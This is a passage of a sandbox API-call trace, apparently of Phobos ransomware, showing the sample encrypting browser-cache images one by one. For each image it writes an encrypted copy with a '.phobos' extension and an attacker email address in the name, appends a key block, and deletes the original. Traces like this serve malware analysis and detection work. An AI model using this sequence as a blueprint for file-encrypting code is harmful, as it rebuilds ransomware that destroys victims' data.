(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa61yi9[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0169.112] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0169.112] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0169.112] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x19d, lpOverlapped=0x0) returned 1 [0169.145] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0) returned 1 [0169.145] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a0, lpOverlapped=0x0) returned 1 [0169.146] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0169.146] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0169.146] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0169.146] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.146] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0169.146] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0169.146] CloseHandle (hObject=0x17c) returned 1 [0169.146] CloseHandle (hObject=0x130) returned 1 [0169.146] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa61yi9[1].png")) returned 1 [0169.147] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0169.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aadavrm[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0169.148] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=834) returned 1 [0169.148] CloseHandle (hObject=0x130) returned 1 [0169.149] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aadavrm[1].png")) returned 0x2020 [0169.149] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aadavrm[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aadavrm[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0169.149] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0169.149] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0169.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aadavrm[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0169.150] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0169.150] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0169.150] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x342, lpOverlapped=0x0) returned 1 [0172.200] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x350, dwBufLen=0x350 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x350) returned 1 [0172.200] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x350, lpOverlapped=0x0) returned 1 [0172.836] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0172.836] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0172.836] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0172.836] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0172.836] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0172.836] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0172.836] CloseHandle (hObject=0x130) returned 1 [0172.836] CloseHandle (hObject=0x17c) returned 1 [0172.836] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aadavrm[1].png")) returned 1 [0172.871] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0172.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbl0ij[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0172.875] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2315) returned 1 [0172.875] CloseHandle (hObject=0x130) returned 1 [0172.875] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbl0ij[1].jpg")) returned 0x2020 [0172.876] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbl0ij[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0172.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbl0ij[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0172.876] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0172.876] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0172.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbl0ij[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0172.876] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0172.876] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0172.876] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x90b, lpOverlapped=0x0) returned 1 [0173.412] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x910, dwBufLen=0x910 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x910) returned 1 [0173.412] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x910, lpOverlapped=0x0) returned 1 [0173.413] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0173.413] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.413] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0173.413] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.413] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0173.413] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0173.413] CloseHandle (hObject=0x130) returned 1 [0173.413] CloseHandle (hObject=0x158) returned 1 [0173.413] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbl0ij[1].jpg")) returned 1 [0173.414] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0173.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo1mq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0173.415] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5997) returned 1 [0173.415] CloseHandle (hObject=0x158) returned 1 [0173.415] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo1mq[1].jpg")) returned 0x2020 [0173.415] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo1mq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo1mq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0173.416] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.416] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo1mq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0173.416] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0173.416] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.416] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x176d, lpOverlapped=0x0) returned 1 [0173.629] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1770, dwBufLen=0x1770 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1770) returned 1 [0173.630] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1770, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1770, lpOverlapped=0x0) returned 1 [0173.631] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0173.631] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.631] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0173.631] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.631] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0173.631] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0173.631] CloseHandle (hObject=0x158) returned 1 [0173.631] CloseHandle (hObject=0x130) returned 1 [0173.631] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO1mQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo1mq[1].jpg")) returned 1 [0173.632] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0173.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo3tl[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0173.633] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=25112) returned 1 [0173.633] CloseHandle (hObject=0x130) returned 1 [0173.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo3tl[1].jpg")) returned 0x2020 [0173.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo3tl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo3tl[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0173.634] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.634] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0173.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo3tl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0173.634] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0173.634] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.634] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x6218, lpOverlapped=0x0) returned 1 [0173.794] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6220, dwBufLen=0x6220 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6220) returned 1 [0173.794] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x6220, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x6220, lpOverlapped=0x0) returned 1 [0173.795] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0173.795] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0173.795] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0173.795] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.795] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0173.795] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0173.795] CloseHandle (hObject=0x130) returned 1 [0173.795] CloseHandle (hObject=0x158) returned 1 [0173.795] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBO3tl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbo3tl[1].jpg")) returned 1 [0173.796] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: 